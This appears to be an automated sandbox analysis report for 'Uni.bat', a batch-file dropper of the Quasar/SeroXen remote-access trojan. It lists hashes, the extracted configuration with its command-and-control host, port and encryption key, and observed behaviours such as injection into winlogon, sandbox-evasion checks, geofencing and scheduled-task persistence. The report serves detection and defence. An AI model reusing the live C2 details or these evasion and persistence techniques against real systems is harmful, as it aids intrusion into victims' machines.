Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 11:55
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win7-20240215-en
General
-
Target
Uni.bat
-
Size
512KB
-
MD5
d188d8d8e859b13330551005efc1f6cb
-
SHA1
6e3e2c19174c7cd0e9a2c248c700cd25a7ee17da
-
SHA256
7de9346c81bcb5b91230450e2092f27851f5cffb1837058e611ac103974f680a
-
SHA512
1847acf391c3d7a21962ae19908af637f239edaab741d2c7dc9e876b04dea6f54b7d9d42ebf3634fff9283692b7ecb566e067368a77e618bb8b5ef402e33e59f
-
SSDEEP
12288:i7ET3QCkmortzhYOPdMa0cqLepCUBD5LSWjU2d:GY3QCk7hXdMaELkVjU2d
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-xPAuDxLNyBmZ7S2WLJ
-
encryption_key
Pw78RUs175dFrKD7lMwH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3544-79-0x00000000071E0000-0x000000000724C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3440 created 616 3440 powershell.EXE winlogon.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 19 3544 powershell.exe 22 3544 powershell.exe 24 3544 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 1900 powershell.exe 3544 powershell.exe 4684 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
Client.exeinstall.exepid process 1312 Client.exe 2508 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3440 set thread context of 4864 3440 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
wmiprvse.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 56 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEsvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715428612" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE -
Modifies registry class 8 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEsihost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe -
Processes:
Client.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Client.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Client.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Client.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeClient.exepowershell.EXEdllhost.exepid process 1900 powershell.exe 1900 powershell.exe 4684 powershell.exe 4684 powershell.exe 3544 powershell.exe 3544 powershell.exe 1312 Client.exe 1312 Client.exe 3440 powershell.EXE 3440 powershell.EXE 3440 powershell.EXE 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe 4864 dllhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe 4340 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeIncreaseQuotaPrivilege 4684 powershell.exe Token: SeSecurityPrivilege 4684 powershell.exe Token: SeTakeOwnershipPrivilege 4684 powershell.exe Token: SeLoadDriverPrivilege 4684 powershell.exe Token: SeSystemProfilePrivilege 4684 powershell.exe Token: SeSystemtimePrivilege 4684 powershell.exe Token: SeProfSingleProcessPrivilege 4684 powershell.exe Token: SeIncBasePriorityPrivilege 4684 powershell.exe Token: SeCreatePagefilePrivilege 4684 powershell.exe Token: SeBackupPrivilege 4684 powershell.exe Token: SeRestorePrivilege 4684 powershell.exe Token: SeShutdownPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeSystemEnvironmentPrivilege 4684 powershell.exe Token: SeRemoteShutdownPrivilege 4684 powershell.exe Token: SeUndockPrivilege 4684 powershell.exe Token: SeManageVolumePrivilege 4684 powershell.exe Token: 33 4684 powershell.exe Token: 34 4684 powershell.exe Token: 35 4684 powershell.exe Token: 36 4684 powershell.exe Token: SeIncreaseQuotaPrivilege 4684 powershell.exe Token: SeSecurityPrivilege 4684 powershell.exe Token: SeTakeOwnershipPrivilege 4684 powershell.exe Token: SeLoadDriverPrivilege 4684 powershell.exe Token: SeSystemProfilePrivilege 4684 powershell.exe Token: SeSystemtimePrivilege 4684 powershell.exe Token: SeProfSingleProcessPrivilege 4684 powershell.exe Token: SeIncBasePriorityPrivilege 4684 powershell.exe Token: SeCreatePagefilePrivilege 4684 powershell.exe Token: SeBackupPrivilege 4684 powershell.exe Token: SeRestorePrivilege 4684 powershell.exe Token: SeShutdownPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeSystemEnvironmentPrivilege 4684 powershell.exe Token: SeRemoteShutdownPrivilege 4684 powershell.exe Token: SeUndockPrivilege 4684 powershell.exe Token: SeManageVolumePrivilege 4684 powershell.exe Token: 33 4684 powershell.exe Token: 34 4684 powershell.exe Token: 35 4684 powershell.exe Token: 36 4684 powershell.exe Token: SeIncreaseQuotaPrivilege 4684 powershell.exe Token: SeSecurityPrivilege 4684 powershell.exe Token: SeTakeOwnershipPrivilege 4684 powershell.exe Token: SeLoadDriverPrivilege 4684 powershell.exe Token: SeSystemProfilePrivilege 4684 powershell.exe Token: SeSystemtimePrivilege 4684 powershell.exe Token: SeProfSingleProcessPrivilege 4684 powershell.exe Token: SeIncBasePriorityPrivilege 4684 powershell.exe Token: SeCreatePagefilePrivilege 4684 powershell.exe Token: SeBackupPrivilege 4684 powershell.exe Token: SeRestorePrivilege 4684 powershell.exe Token: SeShutdownPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeSystemEnvironmentPrivilege 4684 powershell.exe Token: SeRemoteShutdownPrivilege 4684 powershell.exe Token: SeUndockPrivilege 4684 powershell.exe Token: SeManageVolumePrivilege 4684 powershell.exe Token: 33 4684 powershell.exe Token: 34 4684 powershell.exe Token: 35 4684 powershell.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
